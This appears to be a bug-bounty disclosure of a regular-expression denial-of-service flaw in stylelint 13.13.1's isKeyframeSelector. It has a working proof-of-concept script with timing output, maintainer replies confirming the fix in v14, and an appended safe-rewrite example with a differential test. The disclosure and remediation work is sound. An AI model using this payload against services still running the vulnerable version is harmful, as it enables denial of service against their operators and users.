Inefficient Regular Expression Complexity in stylelint/stylelint


Reported on

Oct 16th 2021


I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in stylelint.

It allows causing a denial of service when calling the function isKeyframeSelector.

Proof of Concept

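// PoC.js
var isKeyframeSelector = require("stylelint/lib/utils/isKeyframeSelector")

for(var i = 1; i <= 50000; i++) {
    // Start the timer for this iteration
    var time = Date.now();
    // A growing run of digits followed by a character that forces the match to fail
    var attack_str = '1'.repeat(i*10000)+"a";
    isKeyframeSelector(attack_str);
    // Elapsed time for this input length
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}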

Check The Output

"attack_str.length: 10001: 290 ms"
"attack_str.length: 20001: 1072 ms"
"attack_str.length: 30001: 2047 ms"
"attack_str.length: 40001: 3640 ms"
"attack_str.length: 50001: 5688 ms"
"attack_str.length: 60001: 8237 ms"
Yeting Li
a year ago


@admin, please see the security policy

We have contacted a member of the stylelint team and are waiting to hear back (a year ago)
stylelint/stylelint maintainer
a year ago

Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.

Yeting Li
a year ago


Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.

stylelint/stylelint maintainer
a year ago

Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.

As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?

Yeting Li
a year ago


Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!

stylelint/stylelint maintainer validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
stylelint/stylelint maintainer confirmed that a fix has been merged on 060310 a year ago
The fix bounty has been dropped
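
Added example, not part of the original report and not stylelint's code: a constructed regex whose two alternatives overlap on digit runs, which gives the kind of growth seen in the proof-of-concept output above, next to an unambiguous rewrite with a length cap and a differential check that the two accept the same strings. The patterns, `MAX_SELECTOR_LENGTH` and all function names are assumptions made for illustration.

```javascript
// Constructed pattern (assumption, not copied from stylelint). The quantifiers
// overlap, so on "111...1a" the engine retries every split of the digit run
// before it can fail: work grows roughly with the square of the length.
const AMBIGUOUS = /^(?:\d+\.?\d*|\d*\.?\d+)%$/;

// Accepts the same strings, but a digit run can be consumed in only one way.
const UNAMBIGUOUS = /^(?:\d+(?:\.\d*)?|\.\d+)%$/;

// Hypothetical cap: a legitimate percentage selector is only a few characters.
const MAX_SELECTOR_LENGTH = 64;

function isPercentageSelector(selector) {
  if (typeof selector !== "string" || selector.length > MAX_SELECTOR_LENGTH) {
    return false;
  }
  return UNAMBIGUOUS.test(selector);
}

// Every string of length 0..maxLen over the given alphabet.
function enumerate(alphabet, maxLen) {
  let level = [""];
  const all = [""];
  for (let len = 1; len <= maxLen; len++) {
    level = level.flatMap((prefix) => alphabet.map((ch) => prefix + ch));
    all.push(...level);
  }
  return all;
}

// Differential check: the samples on which the two patterns disagree.
function disagreements(samples) {
  return samples.filter((s) => AMBIGUOUS.test(s) !== UNAMBIGUOUS.test(s));
}

function elapsedMs(regex, input) {
  const start = Date.now();
  regex.test(input);
  return Date.now() - start;
}

// Constructed input in the PoC's shape, kept short so the slow case finishes.
const probe = "1".repeat(10000) + "a";
console.log("ambiguous:  ", elapsedMs(AMBIGUOUS, probe), "ms");
console.log("unambiguous:", elapsedMs(UNAMBIGUOUS, probe), "ms");
console.log("disagreements:", disagreements(enumerate(["1", ".", "%", "a"], 6)).length);
```

The differential check is what makes the rewrite safe to ship as a regression test: it shows the faster pattern did not change which selectors are accepted.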